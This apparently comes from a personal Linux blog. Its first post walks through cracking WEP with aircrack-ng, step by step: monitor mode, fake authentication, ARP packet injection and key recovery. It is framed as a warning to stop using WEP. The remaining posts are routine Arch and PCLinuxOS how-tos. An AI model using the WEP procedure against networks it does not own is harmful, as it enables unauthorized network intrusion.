Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP TO SECURE YOUR ROUTER!

I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I have counted to 10 I have decided to write this up:

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!

This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning. Warning that should be taken as “WOW! This WEP stuff is really not secure… I better change my router to personal WPA2 right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP secured networks is illegal. You have been warned.

0) Install aircrack-ng-svn from ArchLinux AUR repository:

FIRST WINDOW:

1) Check the name of the wireless interface

iwconfig

says it’s wlan0

2) Check mac address of wlan0

ifconfig wlan0

says YY:YY:YY:YY:YY:YY

3) Optional – not necessary under Backtrack. Kill unnecessary network services that can mess You up:

airmon-ng check kill

Example:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
23899   ifplugd
Killing all those processes…

4) Create wireless interface in monitor mode:

airmon-ng start wlan0

5) Check the name of the wireless monitor mode interface

iwconfig

says it’s mon0

6) Start sniffing to collect router’s data

airodump-ng mon0

Stop airodump with CTRL + C

Information gathered:

Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User

INFO: If ESSID contains spaces put it in the “” or ‘ ‘ in next commands ie “Arch Linux User” or ‘Arch Linux User’.

Router’s CHANNEL: ZZ

7) Kill mon0 interface:

airmon-ng stop mon0

8) Start mon0 fixed at the AP’s channel:

airmon-ng start wlan0 ZZ

9) Now re-write Your sniffing command so it sniffs the right channel / bssid and so it saves the captured packets into a file:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0

IF You get “Fixed channel mon0: -1″ in the right hand corner of the sniffer – then rewrite Your command again by adding –ignore-negative-one so it looks like this:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX  --ignore-negative-one -w ./output mon0

Leave this command running and saving packets.

SECOND WINDOW:

10) Check if the card is capable of packet injection:

aireplay-ng -9 mon0

16:10:47  Injection is working!

11) Try to auth with router:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

if You get this error:

16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33  Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch.

just rewrite Your command by adding “–ignore-negative-one” switch.

Example:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

This command will (should) auth You with a router and then give You the prompt back.

0 – this can take a value between 0 and 512 (experiment)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
–ignore-negative-one fixes the above mentioned error

IF You want to stop this command use CTRL + C

16:16:28  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1

16:16:28  Sending Authentication Request (Open System) [ACK]
16:16:28  Authentication successful
16:16:28  Sending Association Request [ACK]
16:16:28  Association successful (AID: 1)

now fiddle with the “0” in the command – change it’s values to something between 1 and 512.

Example:

aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Leave this command running.

THIRD WINDOW:

12) Start to inject:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

If You get these errors:

16:21:36  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36  Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

rewrite the command by adding “-e Arch_Linux_User” and “–ignore-negative-one” switches.

Example:

aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Meanwhile You can (but You do not have to) fiddle with the airmon-ng “-1″ command in the second window. Change the value of “0″ to different values between 1 and 512 – see which is better for You… Sometimes 1 will do juuuust fine.

After a while You _should_ receive ARP request packet… and… START TO INJECT THEM.

FOURTH WINDOW:

13) When collected some ARP packets You can start the cracking process:

aircrack-ng -z ./output*.cap

and soon after that You should be able to see this sort of message:

KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%

That’s it… You’re all done…

It takes less then 5 minutes to crack WEP key… 5 minutes guys and girls… and Your wireless network has been compromised… Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that…

Cheers.

AndrzejL

[PCLinuxOS] Manually upgrading Bind / Named to version 9.9.2-P2 [Security patches].

Hi folks.

Latest Bind / Named version was released several days ago to patch this vulnerability.

I will try to show how to download, extract, configure and install the latest version.

Open terminal window and follow this set of instructions:

su

root's password

export PREFIX=`echo /usr/`

export PATH=$PREFIX/bin:$PATH

export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig:$PREFIX/share/pkgconfig

cd /opt/

mkdir Bind

cd Bind

wget -c ftp://ftp.isc.org/isc/bind9/9.9.2-P2/bind-9.9.2-P2.tar.gz

tar xvzf ./bind-9.9.2-P2.tar.gz

cd bind-9.9.2-P2

./configure --prefix=$PREFIX --sysconfdir=/etc/

You can expect missing dependencies here. I had no problems whatsoever as I have a good few “devel” packages installed – try figuring out what You’re missing if You do run into a snag, then install it from Synaptic (without closing this window) and re-run the above configure step till there are no errors.

make

make install

ls --full /var/lib/named/var/

one of the listed items should look like this:

drwxr-xr-x 7 root root 4096 2013-03-22 09:08:02.163308440 +0100 named/

ls --full /var/lib/named/var/named

chown named:named /var/lib/named/var/named/

drwxr-xr-x 7 named named 4096 2013-03-22 09:08:08.221303100 +0100 named/

Now in this terminal window type in

named -v

the reply should look like this:

BIND 9.9.2-P2

service named restart

and the reply should look something like this:

Stopping named: [ Failed ]
Starting named: [ OK ]

This should be it… You have compiled and are running latest patched version of Bind…

Regards.

Andy

[Arch Linux] Solving the ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting – wireless dropouts.

Hi all.

I have this Belkin rt73usb card – it’s connected to this SUPER OLD Thinkpad 600E machine and it’s associated always with only one router – static IP setup – basically laptop is stationary / not moved. I had little problems with connecting it to the network at boot time but thanks to Boohbah from #Archlinux channel and a bit of research I got it to connect and to turn off power management and to keep the rate as “fixed” 54M – worked well BUT… I had a problem with it – the connection stayed up – I could browse the internet from the thinkpad / I could access the sshfs share on my server (from Thinkpad 600E) and so on but after a while sshd port – 50505 in my case – was switching from open into filtered and I could not connect to it anymore.

Example – rebooted Thinkpad 600E – i can connect – Thinkpad was left alone for lets say sometimes 10 minutes – sometimes an hour – connection was active but I could not ssh to the machine anymore.

After a bit of investigating I have found this line in the dmesg (after the connection dropped)

ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting

and I had googled it but could not find solution so I have asked for help on the Arch Linux forum and Strike0 has sorted me out in no time. Thanks Dude!

I am reposting the info here just in case forum post goes missing in the future. To solve this issue I had to do this:

As root add:

options rt73usb nohwcrypt=1

to the file:

/etc/modprobe.d/modprobe.conf

and save it. Then re-create kernel image with

mkinitcpio -p linux

and reboot.

Hope someone will find it useful in the future.

Regards.

Andrzej

[Arch Linux] Bloody RT73 USB dongle wouldn't connect at boot time.

Hi all.

I own this dongle:

Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

It’s plugged in to my “stationary” IBM Thinkpad 600E laptop. Only one network. Static IP. It would connect to internet when system was booted fully but not during boot time.

BIG thanks to Boohbah he sorted me out when I was loosing all hope…

To solve this issue I had to do this (as root):

Create two files:

/etc/systemd/system/network@wlan0.service

With content:

[Unit]
Description=Network Connectivity (%i)
Wants=network.target
Before=network.target
BindsTo=sys-subsystem-net-devices-%i.device
After=sys-subsystem-net-devices-%i.device

[Service]
Type=oneshot
RemainAfterExit=yes
EnvironmentFile=/etc/conf.d/network
ExecStart=/sbin/ip link set dev ${interface} up
ExecStart=/usr/sbin/wpa_supplicant -B -i ${interface} -c /etc/wpa_supplicant.conf
ExecStart=/sbin/ip addr add ${address}/${netmask} broadcast ${broadcast} dev ${interface}
ExecStart=/sbin/ip route add default via ${gateway}
ExecStart=/usr/sbin/iwconfig ${interface} power off
ExecStart=/usr/sbin/iwconfig ${interface} rate 54M fixed
ExecStop=/sbin/ip addr flush dev ${interface}
ExecStop=/sbin/ip link set dev ${interface} down

[Install]
WantedBy=multi-user.target

and

/etc/conf.d/network

with content:

interface=wlan0
address=192.168.0.102
netmask=24
broadcast=192.168.0.255
gateway=192.168.0.1

Your IP / gateway may vary. You will also have to edit file:

/etc/resolv.conf

So it contains DNS servers that You’re using. Example:

nameserver 192.168.0.1

and then enable service:

systemctl enable network@wlan0.service

and reboot.

After the reboot my card was connected.

[root@wishthinkpad andrzejl]# journalctl -b | grep wlan0
Jan 05 04:31:50 wishthinkpad.loc systemd[1]: Expecting device sys-subsystem-net-devices-wlan0.device…
Jan 05 04:32:03 wishthinkpad.loc systemd[1]: Starting Network Connectivity (wlan0)…
Jan 05 04:32:03 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
Jan 05 04:32:04 wishthinkpad.loc systemd[1]: Started Network Connectivity (wlan0).
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticate with 00:18:39:a0:db:3e
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: send auth to 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticated
Jan 05 04:32:06 wishthinkpad.loc kernel: rt73usb 1-1.1:1.0: wlan0: disabling HT as WMM/QoS is not supported
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associate with 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: RX AssocResp from 00:18:39:a0:db:3e (capab=0×411 status=0 aid=1)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associated
Jan 05 04:32:06 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[root@wishthinkpad andrzejl]#

Thanks again Boohbah I wouldn’t be able to solve that without You.

Hopefully someone else can use it in the future.

Regards.

Andrzej

EDIT 01: Adding pci=noacpi as a kernel parameter seems to make this temperamental USB device to behave slightly better…

Cool trick – speeding up LibreOffice by pre-loading it during boot.

Hi all.

I have decided to speed up opening of the LibreOffice and its components by pre-loading it after I log into my system.

This is not a trick for people with low ram machines. Why? It pre-loads LibreOffice on system start and keeps it in the memory so unless you are willing to sacrifice something between 64 – 256 MB of RAM – this how-to is not for You.

Still interested? Great. Do this:

Open terminal and run those commands:

touch ~/.config/autostart/preload_libreoffice.sh

chmod +x ~/.config/autostart/preload_libreoffice.sh

mcedit ~/.config/autostart/preload_libreoffice.sh

Now copy this:

#!/bin/sh
sleep 15
loffice --nodefault --nologo &
PID=$!
sleep 10
kill $PID

Click on the mcedit window and press SHIFT + INS(ERT). Content of the clipboard should now be pasted into the mcedit. Now press F2 to invoke saving dialog. Now press F10 to invoke closing dialog.

Close the terminal and open any part of the LibreOffice (writer, calc, draw whatever ails you…) and click Tools > Options from the menu bar. Now in the LibreOffice menu find and click Memory. See the Use for LibreOffice box? Change it’s value to something like 64, 128 or 256. Now OK the Options window and close LibreOffice.

Now reboot Your machine and log into it. Give it some time (15 seconds) to run the script in the background and try opening LibreOffice component… It should start in less then 1 second.

Regards.

Andrzej

[Arch Linux] Playing DVD Videos in SMPlayer. Adding SMPlayer entry in KDE's Device Notifier.

Hi folks.

I have installed Arch Linux few days ago. I am loving it.

By default SMPlayer won’t play DVD videos neither will it have entry in the KDE4 Device Notifier to do so. Here is how I got it to work:

I assume You have a fully upgraded system.

Run this:

su

Now give it root’s password.

Now run this:

pacman -S smplayer libdvdcss libdvdnav libdvdread

and agree to install all the packages and their dependencies.

Now run this:

mcedit /etc/udev/rules.d/82-cdrom.rules

and paste this as a content:

SUBSYSTEM=="block", KERNEL=="sr0", SYMLINK+="cdrom cdrw dvd dvdrw"


Big thank You to sudokode for helping me with the udev rule.

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Now if You’re not using KDE4 and You do not need or want the Device Notifier entry You can reboot. SMPlayer will be able to play Your dvd videos now.

For those that want and need the Device Notifier entry please continue in the same terminal.

Run this:

mkdir -p /usr/share/apps/solid/actions/

mcedit /usr/share/apps/solid/actions/smplayer_play_dvd.desktop

and paste this:

[Desktop Entry]
Type=Service
Actions=PlayDVD;
X-KDE-Solid-Predicate=OpticalDisc.availableContent & 'VideoDvd'

[Desktop Action PlayDVD]
Name=Play DVD with SMPlayer
Exec=smplayer dvd://%U
Icon=smplayer


Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Reboot Your machine.

Now when You insert DVD disc into the drive Device Notifier will ask You what do You want to do. One of the options should be to “Play DVD with SMPlayer”

Regards.

Andrzej

Testing Mozilla Thunderbird Central Daily 20 safely on PCLinuxOS 2012.x

Hi all.

I wanted to test the latest version of the e-mail client from Mozilla. I am a huge fan of Thunderbird and it always was my main e-mail client. PCLinuxOS comes with the latest stable version. Its a good thing. I love stability of my distribution. However I want to try the newest Mozilla product before it becomes a default for PCLinuxOS. Also I want to help Mozilla Developers by filing a bug reports and make their products even better this way.

Here are few simple steps You can do if You want to test it too.

Thunderbird is a default PCLinuxOS e-mail client so its installed by default. If You removed it – reinstall it via synaptic.

Older version must be installed for few minor yet important reasons.

Close Thunderbird completely. Now open console and run these commands:

cd

Go to Your /home/ folder

This version of Thunderbird is a bleeding edge release so ride might be little bumpy. I never noticed any problems but just to be on the safe side…

cp -R ~/.thunderbird ~/.thunderbird.backup.20

let’s backup Your profile first.

wget -c http://ftp.mozilla.org/pub/mozilla.org/thunderbird/nightly/latest-comm-central/thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Download the compressed Daily XX file.

tar -xvjf ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Extract it.

rm -f ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Remove it.

su

Gain root privileges…

root password

…by giving correct root password.

rm -f /usr/bin/thunderbird

Remove old executable.

rm -f /usr/bin/mozilla-thunderbird

Remove old executable.

ln -s /home/yourlogin/thunderbird/thunderbird /usr/bin/thunderbird

Create symlink to a new executable in Your home folder. Replace yourlogin with Your actual login.

ln -s /home/yourlogin/thunderbird/mozilla-thunderbird /usr/bin/mozilla-thunderbird

Create symlink to a new executable in Your home folder. Replace yourlogin with Your actual login.

exit

exit

Go back to user mode and close the console.

Now You can use the old shortcuts (from the desktop, panel or KMenu) to open new Thunderbird. All the programs should open the mailto: links in new version of Thunderbird too.

Enjoy the latest and the greatest from Mozilla. I am. If You are using Daily You should know that it can also be safely upgraded to the latest version by using Help > About Daily from the Thunderbird menu bar.

Going back to the repo version of Thunderbird.

Close Thunderbird completely. Reinstall Thunderbird using Synaptic.

Regards.

Andy